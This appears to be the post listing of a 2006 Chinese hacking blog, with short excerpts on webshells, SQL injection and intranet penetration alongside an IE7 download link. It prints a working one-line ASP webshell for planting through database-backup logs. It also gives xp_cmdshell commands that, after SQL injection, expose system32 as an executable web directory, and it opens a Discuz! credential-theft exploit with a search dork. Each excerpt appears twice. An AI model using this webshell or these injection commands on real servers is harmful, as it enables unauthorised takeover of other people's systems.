IE7.0正式简体中文版今天发布了!体验一下!
[ 2006年11月30日 ]
Tags:
刚刚装好,有点不习惯.呵呵.
下面是官方的下载地址:
http://download.microsoft.com/download/4/1/8/418981A4-6EF9-4DE6-BEFC-1A53E886CB62/ie7-windowsxp-x86-chs.exe
下面是官方的下载地址:
http://download.microsoft.com/download/4/1/8/418981A4-6EF9-4DE6-BEFC-1A53E886CB62/ie7-windowsxp-x86-chs.exe
阅读全文 | 分类:资源共享 | 评论:4 | 引用:0 | 浏览:
DB_ONER权限日志备分专用一句话木马
[ 2006年11月26日 ]
Tags:
来源:s0n9 '5 b109
<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
命令行下建立虚拟目录
[ 2006年11月26日 ]
Tags:
文章作者:臭要饭的!
很久,很久没有和大家聊天了,很想大家的。见面先就给大家送个小礼吧。其实也不是什么好东西。
在研究和学习中进步,没有研究,没有深入的去了解,就没有进步。认真的学习态度+穷追不舍+十万个为什么。
得到的结果就是成就!
很久,很久没有和大家聊天了,很想大家的。见面先就给大家送个小礼吧。其实也不是什么好东西。
在研究和学习中进步,没有研究,没有深入的去了解,就没有进步。认真的学习态度+穷追不舍+十万个为什么。
得到的结果就是成就!
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
netsh配置防火墙
[ 2006年11月26日 ]
Tags:
现在越来越多的服务器用的是ICS防火墙,配合ipsec来管理远程登陆和端口安全
搞的真是要天下无黑了
很多服务器直接打下来却连不上3389,仔细分析完也没找到什么防火墙或者新鲜软件,ipsec服务关闭以后也没效果。着实郁闷了一翻
想一想就是自带ICS搞的鬼吧
搞的真是要天下无黑了
很多服务器直接打下来却连不上3389,仔细分析完也没找到什么防火墙或者新鲜软件,ipsec服务关闭以后也没效果。着实郁闷了一翻
想一想就是自带ICS搞的鬼吧
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
如何配置ISA Server 的网络环境
[ 2006年11月24日 ]
Tags:
很多朋友提出在他的网络环境中是否有必要安装ISA、是否可以安装ISA、安装前ISA后内部的客户如何进行配置、安装后的访问规则如何设置等问题,我在这篇文章阐述一下。
ISA Server 2004是目前世界上最好的路由级软件防火墙,它可以让你的企业安全、快速的连接到Internet,性能可以和硬件防火墙媲美,并且深层的应用层识别功能是很多基于包过滤的硬件防火墙都不具有的。你可以在网络的任何地方,如两个或多个网络的边缘层(Lan到Internet、Lan到Lan、Lan到DMZ、Lan到VPN等等)、单个主机上配置ISA Server 2004来对你的网络或主机进行防护。
ISA Server 2004是目前世界上最好的路由级软件防火墙,它可以让你的企业安全、快速的连接到Internet,性能可以和硬件防火墙媲美,并且深层的应用层识别功能是很多基于包过滤的硬件防火墙都不具有的。你可以在网络的任何地方,如两个或多个网络的边缘层(Lan到Internet、Lan到Lan、Lan到DMZ、Lan到VPN等等)、单个主机上配置ISA Server 2004来对你的网络或主机进行防护。
阅读全文 | 分类:资源共享 | 评论:0 | 引用:0 | 浏览:
Discuz! 4.x SQL injection / admin exploit
[ 2006年11月18日 ]
Tags:
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "powered by discuz!
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "powered by discuz!
---------------------------------------------------------------------------
阅读全文 | 分类:矩阵毒刺 | 评论:0 | 引用:0 | 浏览:
SQL注入建立虚拟目录,免得找Web绝对路径
[ 2006年11月18日 ]
Tags:
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
加密CMD使电脑溢出也拿不到CMD权限
[ 2006年11月15日 ]
Tags:
以下是lock.bat文件
@echo off
title 密码验证
@echo off
title 密码验证
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
大企业内网渗透的常见软件级突破点
[ 2006年11月13日 ]
Tags: 内网渗透
文章来源 安全焦点论坛
一些企业级网络,尤其是欧美的大公司,其网络结构的一般特点是dmz区和内网基本隔绝,域划分清晰,权限设置细致严格,防火墙和IDS配置完备。要想进行攻击和渗透,其思路与入侵一些只使用虚拟主机服务或者只有一台独立web服务器的小公司站点自然完全不同。但大公司也有大公司的问题,比如一个总部设在美国的公司,其要整合该公司在美国各州以至全球各地的分公司的局域网来联合工作或者架构成统一管理的公司级内网,必然也要 使用一些特殊的网络应用和解决方案,而这些应用和方案往往是安全防范的最薄弱环节,也是黑客们 渗透攻击的常用切入点。在软件方面,目前被利用来渗透的有如下切入点:
一些企业级网络,尤其是欧美的大公司,其网络结构的一般特点是dmz区和内网基本隔绝,域划分清晰,权限设置细致严格,防火墙和IDS配置完备。要想进行攻击和渗透,其思路与入侵一些只使用虚拟主机服务或者只有一台独立web服务器的小公司站点自然完全不同。但大公司也有大公司的问题,比如一个总部设在美国的公司,其要整合该公司在美国各州以至全球各地的分公司的局域网来联合工作或者架构成统一管理的公司级内网,必然也要 使用一些特殊的网络应用和解决方案,而这些应用和方案往往是安全防范的最薄弱环节,也是黑客们 渗透攻击的常用切入点。在软件方面,目前被利用来渗透的有如下切入点:
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
10月28号安全焦点DDOS事件背后内幕串串烧
[ 2006年11月11日 ]
Tags: DDOS
本文转载自安全焦点
10月28号安全焦点DDOS事件背后内幕串串烧~~
主题:讲述安焦被DDOS背后的故事及部分安全知识!同时奉送ASP.NET备份db日志获得webshell小知识,小小伎俩,牛人莫笑话俺了。
10月28号安全焦点DDOS事件背后内幕串串烧~~
主题:讲述安焦被DDOS背后的故事及部分安全知识!同时奉送ASP.NET备份db日志获得webshell小知识,小小伎俩,牛人莫笑话俺了。
阅读全文 | 分类:资源共享 | 评论:0 | 引用:0 | 浏览:
|